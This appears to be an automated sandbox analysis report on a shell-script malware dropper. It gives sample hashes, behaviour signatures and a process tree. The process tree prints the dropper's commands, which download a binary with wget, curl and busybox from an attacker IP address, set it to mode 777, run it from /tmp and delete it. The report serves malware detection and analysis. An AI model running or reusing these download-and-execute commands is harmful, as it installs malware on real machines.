Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/11/2024, 03:04
Static task
static1
Behavioral task
behavioral1
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
-
Size
10KB
-
MD5
21babea83b818a044ea8aa5448fcb3cb
-
SHA1
20cd57f2ec215de9679cbe64954812f7b0aa6107
-
SHA256
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855
-
SHA512
9c33a7cffe538e0624283146cb4c8ebcfd96e23282a4a1010138d0a83b9671b0b1607c10c3aae2d1c377ca63d5e06b8ea22d358d53d7bd8626d1f576d863b1a8
-
SSDEEP
96:nM/LbT0AbObHbjbfLb6bybIBhw31aADk/kbkTkikCkefhG3NahCk/kbkTkikCka0:nqOLPHOuMBilaAsObLPHOu5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh (PID:719)
- /bin/rm: /bin/rm bins.sh (PID:722)
- /usr/bin/wget: wget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:725)
- /usr/bin/curl: curl -O http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:742)
  - Reads runtime system information
  - Writes file to tmp directory
- /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:749)
- /bin/chmod: chmod 777 pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:751)
  - File and Directory Permissions Modification
- /tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr: ./pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:752)
  - Executes dropped EXE
- /bin/rm: rm pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr (PID:753)
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97